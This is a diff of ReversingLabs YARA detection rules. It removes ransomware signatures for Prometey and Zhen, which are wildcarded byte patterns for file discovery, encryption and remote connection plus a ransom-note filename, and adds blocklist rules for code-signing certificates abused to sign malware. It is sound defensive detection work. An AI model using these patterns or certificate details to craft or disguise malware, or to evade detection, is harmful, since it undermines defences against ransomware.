-            15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ??
-            50 6A ?? 6A ?? 6A ?? FF 15
-        }
-		$instruction_string = "INSTRUCTIONS HOW TO GET YOUR FILES BACK.txt" wide
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhengzhoushi Tiekelian Information Technology Co.,Ltd" and pe.signatures [ i ] . serial == "55:ab:71:a3:f9:dd:e3:ef:20:c7:88:dd:1d:5f:f6:c3" and 1323907200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_4Beca26210737A5442Ff8B47 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "30570c07-9ba1-5b7c-a369-c6def80f9dc5"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15572-L15588"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7a1130413ae8807dc1ec96a6b1c3bac705a1520f7268db2848b997f6f3f9fc9b"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $entry_point at pe.entry_point ) and $dump_instruction and $extension_rule and $instruction_string
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "4b:ec:a2:62:10:73:7a:54:42:ff:8b:47" and 1476437049 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Prometey : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0F203839A9C63B8798A7Cb31 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Prometey ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a5902fc6-2752-520f-be84-df9ea7b1e27d"
-		date = "2021-06-07"
-		modified = "2021-06-07"
+		id = "dc8428f3-ff28-5fcf-9855-f20c68973afe"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Prometey.yara#L1-L156"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f14c9605e2d375176b461fd396be66754b0ace7dcaada8ca33ad86f6eda10b73"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15590-L15606"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "604ba3fa671cc98e42caf80d07bc9650d193f898413517b46482f183b0f7008a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Prometey"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            55 8D AC 24 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 85 ?? ?? ?? ?? 53 56 57 50 8D 45 ?? 64 A3
-            ?? ?? ?? ?? 6A ?? 5E 8D 85 ?? ?? ?? ?? 89 75 ?? 50 BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ??
-            ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5B 8D 4D ?? 88 5D ?? E8 ?? ??
-            ?? ?? 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03
-            C1 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 95 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 59 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85
-            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 33 DB 53 53 53 53 50 88 5D
-        }
-		$remote_connection_p2 = {
-            FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 53 56 53 53 6A ?? 68 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B D8 85 DB 74 ?? 6A ?? 68 ?? ?? ?? ??
-            33 C0 50 50 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ??
-            33 C0 50 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50
-            E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ??
-            8D 4D ?? E8 ?? ?? ?? ?? 56 FF D7 53 FF D7 FF 75 ?? FF D7 80 7D ?? ?? 74 ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8D
-            ?? ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 81 C5 ?? ?? ?? ?? C9 C3 8B 85 ?? ?? ?? ?? 85 C0 0F
-            84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? 8D 95 ?? ?? ?? ?? C6 84 05 ?? ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? ?? E8
-        }
-		$find_files_p1 = {
-            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ??
-            ?? BA ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? 8D 4D ?? 8B D3 C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
-            51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ??
-            ?? 33 C0 8D 7D ?? AB AB AB 33 C0 89 45 ?? 89 45 ?? 89 45 ?? C6 45 ?? ?? F6 85 ?? ??
-            ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 95 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 8B D0 C6 45 ?? ?? 8B 4A
-            ?? 8B 7A ?? 2B CF 39 4E ?? 76 ?? 8B 46 ?? 2B 46 ?? 3B C7 72 ?? 83 7A ?? ?? 72 ?? 8B
-            12 57 52 51 8B CE E8 ?? ?? ?? ?? EB ?? 56 8B CA E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B 45 ?? 0F 43 4D ?? 8D 04 41 8D 4D ?? 0F 43 4D
-            ?? 51 50 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 7D
-            ?? 8B 9D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 83 7D ?? ?? 8B 45 ?? 0F 43 7D ?? 89 8D ??
-            ?? ?? ?? 3B D8 77 ?? 85 DB 75 ?? 8B F3 EB ?? 0F BE 09 2B C3 40 89 8D ?? ?? ?? ?? 03
-        }
-		$find_files_p2 = {
-            C7 89 85 ?? ?? ?? ?? 2B C7 50 51 57 EB ?? 53 FF B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 46 2B C6 50 FF B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            8B F0 83 C4 ?? 85 F6 75 ?? 83 CE ?? 33 DB 56 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 45 ?? 89 5D ?? 50 8D 4D ?? 89 5D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 7D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 7D ?? 85 D2 74 ??
-            83 C9 ?? 8D 42 ?? 3B C1 0F 42 C8 03 CF EB ?? 2B F7 EB ?? 3B CF 74 ?? 49 80 39 ?? 75
-            ?? 2B CF EB ?? 83 C9 ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8D 79 ?? 89 5D ?? C7 45 ?? ?? ??
-            ?? ?? 88 5D ?? 3B D7 0F 82 ?? ?? ?? ?? 2B D7 8D 45 ?? 83 C9 ?? 83 FA ?? 0F 42 CA 83
-            7D ?? ?? 51 0F 43 45 ?? 8D 4D ?? 03 C7 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC
-            8D 45 ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 51 51 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B 78 ?? 03 38 3B FB 7D ?? 81 FE ?? ?? ?? ?? 76 ?? 8D
-        }
-		$find_files_p3 = {
-            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 3B FB 7D ?? 81 FE ?? ?? ?? ??
-            76 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 45 ?? 0F 43 4D
-            ?? 8D 04 41 50 51 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? C6 45
-            ?? ?? 56 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? C6 45 ?? ?? E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
-            ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 51 0F 43 45 ?? 51 50 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 56 BA ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85
-        }
-		$find_files_p4 = {
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 50 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 45
-            ?? 8D 4D ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 45 ?? ?? EB ?? 50 8D 4D ?? E8
-            ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 9D ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ??
-            ?? ?? ?? 8B 7D ?? 8B 75 ?? 6A ?? 5B 3B F7 74 ?? 56 E8 ?? ?? ?? ?? 03 F3 59 3B F7 75
-            ?? 8B 7D ?? 8B 75 ?? 85 F6 74 ?? 3B F7 74 ?? 8B CE E8 ?? ?? ?? ?? 03 F3 3B F7 75 ??
-            8B 75 ?? 8B 45 ?? 2B C6 99 F7 FB 6B C0 ?? 50 56 E8 ?? ?? ?? ?? 59 59 8D 4D ?? E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files = {
-            8B FF 55 8B EC 57 FF 75 ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 8B F8 8B 49 ?? 90 F6 C1 ?? 75
-            ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 45 ?? 6A ?? 59 83 C0 ?? F0 09 08 83 C8 ?? E9
-            ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 90 C1 E8 ?? A8 ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ??
-            ?? EB ?? 8B 45 ?? 8B 40 ?? 90 A8 ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 83 61
-            ?? ?? 84 C0 8B 45 ?? 74 ?? 8B 48 ?? 89 08 8B 45 ?? 6A ?? 59 83 C0 ?? F0 21 08 8B 45
-            ?? 53 6A ?? 5B 83 C0 ?? F0 09 18 8B 45 ?? 6A ?? 59 83 C0 ?? F0 21 08 8B 45 ?? 83 60
-            ?? ?? 8B 45 ?? 8B 40 ?? 90 A9 ?? ?? ?? ?? 75 ?? 56 8B 75 ?? 6A ?? E8 ?? ?? ?? ?? 59
-            3B F0 74 ?? 8B 75 ?? 53 E8 ?? ?? ?? ?? 59 3B F0 75 ?? 57 E8 ?? ?? ?? ?? 59 85 C0 75
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5E FF 75 ?? 8B 5D ?? 53 E8 ?? ?? ?? ?? 59 59 84 C0 75
-            ?? 8B 45 ?? 6A ?? 59 83 C0 ?? F0 09 08 83 C8 ?? EB ?? 0F B6 C3 5B 5F 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "0f:20:38:39:a9:c6:3b:87:98:a7:cb:31" and 1480923809 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Zhen : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Dc992Ea8E6Bb4926931Df656D5Eef8A0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Zhen ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ce6bc48d-934b-582c-8ce7-3dd595cbf5dd"
-		date = "2021-04-28"
-		modified = "2021-04-28"
+		id = "506b217e-ea82-5f14-880e-b6c0cbb001fb"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Zhen.yara#L1-L176"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "17b24e7baeccd90b8695eb8d21d9ee4a317806ed7713252d315d06bee3f93e65"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15608-L15626"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2b261624677a1c4a1ef539106bedcef30f272fda3d833d4c8095e9797d592e1f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Zhen"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B 41 ?? C1 E0 ?? 8B 4D ?? 8B 49 ?? 03 C8 FF 15
-            ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 6A ?? FF 15 ?? ??
-            ?? ?? 8D 55 ?? 8B 4D ?? 83 C1 ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D
-            4D ?? 51 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52
-            E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D
-        }
-		$find_files_p2 = {
-            8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55
-            ?? 52 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 E8
-            ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75
-            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 11 89 95 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B C4 8B 4D ?? 89 08 8B 55 ?? 89 50 ?? 8B 4D ?? 89 48 ?? 8B 55
-            ?? 89 50 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C4 8B 4D ?? 89 08 8B 55 ?? 89 50 ?? 8B
-            4D ?? 89 48 ?? 8B 55 ?? 89 50 ?? 8B 85 ?? ?? ?? ?? 8B 08 8B 95 ?? ?? ?? ?? 52 FF 91
-            ?? ?? ?? ?? DB E2 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? EB ?? 8D
-            4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? FF 15 ?? ?? ??
-            ?? C3 C3 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ??
-            5F 5E 5B 8B E5 5D C2
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 EC ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 66 89 45 ?? 8D 4D ?? FF 15 ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 52 66 8B 45 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 6A ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 E8 ?? 50 6A ?? 6A ??
-            8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66
-            8B 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B
-            55 ?? 52 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 8B
-            02 8B 4D ?? 51 FF 50 ?? 89 45 ?? 83 7D ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52
-            8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 66 89 45
